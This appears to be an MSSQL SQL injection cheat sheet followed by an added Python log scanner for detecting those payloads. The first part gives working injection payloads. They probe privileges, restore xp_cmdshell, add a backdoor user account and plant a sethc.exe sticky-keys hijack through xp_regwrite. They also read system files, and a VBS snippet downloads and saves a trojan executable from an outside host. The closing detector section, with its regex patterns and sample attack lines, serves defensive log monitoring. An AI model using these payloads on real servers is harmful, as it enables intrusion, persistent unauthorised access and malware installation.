MSSQL privilege levels: SA, DB_OWNER, PUBLIC
Statements for determining the privilege level:
SA privilege: and 1 = (select IS_SRVROLEMEMBER('sysadmin'))
DB_OWNER privilege: and 1 = (select IS_MEMBER('db_owner'))
PUBLIC privilege: and 1 = (select IS_MEMBER('public'))
(db_owner and public are database roles, not server roles, so IS_MEMBER is the correct check for them; IS_SRVROLEMEMBER only answers for server roles such as sysadmin.)
With error messages displayed:
Determine the database version and operating system type
and 1 = convert(int,@@version)
Get the database name
and 1 = convert(int,db_name()) and '1' = '1'
Get the current user name
and 1 = convert(int,user_name()) and '1' = '1'
Check whether the xp_cmdshell stored procedure exists
' and 1 = (select count(*) from master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') and '1' ='1
Restore xp_cmdshell
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'
Add an account via xp_cmdshell
http://www.xxx.com/xx.asp?xx=xx';exec master..xp_cmdshell 'net user test test /add'
Add an account via the SP_OACreate procedure
DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',NULL,'c:\windows\system32\cmd.exe /c net user test test /add'
Image File Execution Options hijack (press Shift five times to get into the system)
http://www.xxx.com/xx.asp?xx=xx';exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\MICROSOFT\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','Debugger','REG_SZ','c:\\windows\\explorer.exe'
Reading files with SA privileges
http://www.xxx.com/xx.asp?xx=xx;create%20table%20mydata%20(line%20varchar(80000));--
http://www.xxx.com/xx.asp?xx=xx;bulk%20insert%20mydata%20from%20%27c:\boot.ini%27;--
http://www.xxx.com/xx.asp?xx=xx%20and%201=convert(int,(select%20top%201%20line%20from%20mydata))
Downloading a trojan with VBS
set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xx.com/d.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Type = 1
sGet.open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\d.exe",2
Without error messages displayed:
Determine the number of columns with order by
http://www.xx.com/index.jsp?id=121 order by 5
Get the database version and system type
http://www.xx.com/index.jsp?id=121%20and%201=2%20union%20select%201,2,3,4,5,6,7,8.....
If the page displays 2
http://www.xx.com/index.jsp?id=121%20and%201=2%20union%20select%201,@@version,3,4,5,6,7,8
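The payload families above (role probes, convert(int,...) error-based extraction, xp_cmdshell, sp_addextendedproc, SP_OACreate, xp_regwrite, bulk insert, order by / union probes) are distinctive enough to flag in web-server logs. The following is an added example, not part of the original cheat sheet: a small Python scanner that URL-decodes request query strings and reports which families appear; the indicator names, the regexes and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns derived from the payload families on this page.
# The keys are constructed labels for reporting, not SQL Server identifiers.
INDICATORS = {
    "role_probe":       re.compile(r"\bis_(srv)?rolemember\s*\(|\bis_member\s*\(", re.I),
    "error_based_cast": re.compile(r"\bconvert\s*\(\s*int\s*,\s*(@@version|db_name\(\)|user_name\(\)|\(\s*select\b)", re.I),
    "xp_cmdshell":      re.compile(r"\bxp_cmdshell\b", re.I),
    "addextendedproc":  re.compile(r"\bsp_addextendedproc\b", re.I),
    "ole_automation":   re.compile(r"\bsp_oa(create|method)\b", re.I),
    "registry_write":   re.compile(r"\bxp_regwrite\b", re.I),
    "bulk_insert":      re.compile(r"\bbulk\s+insert\b", re.I),
    "union_probe":      re.compile(r"\border\s+by\s+\d+|\bunion\s+select\b", re.I),
}

def normalize(raw: str) -> str:
    """Decode URL encoding (twice, to catch double-encoded input), drop
    inline comment padding and collapse whitespace before matching."""
    s = unquote_plus(unquote_plus(raw))
    s = s.replace("/**/", " ")
    return re.sub(r"\s+", " ", s)

def classify(query: str) -> list[str]:
    """Return the indicator names whose pattern matches the decoded query string."""
    text = normalize(query)
    return [name for name, pat in INDICATORS.items() if pat.search(text)]

def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Pull the request target out of each access-log line and report the
    (target, indicators) pairs for lines that hit at least one indicator."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        found = classify(m.group(1))
        if found:
            hits.append((m.group(1), found))
    return hits

# Constructed sample log lines (combined-log style), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.jsp?id=121 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.jsp?id=121%20order%20by%205 HTTP/1.1" 500 87',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /xx.asp?xx=xx%27;exec%20master..xp_cmdshell%20%27whoami%27 HTTP/1.1" 500 87',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /xx.asp?xx=xx%20and%201=convert(int,@@version) HTTP/1.1" 500 87',
]

if __name__ == "__main__":
    for target, found in scan_log(SAMPLE_LOG):
        print(f"{target}  ->  {', '.join(found)}")
```

Pair a hit with the HTTP status and response size of the same request: a burst of 500s from one client alongside these signatures is the error-based pattern from the first section, while constant sizes with union probes point at the blind variant.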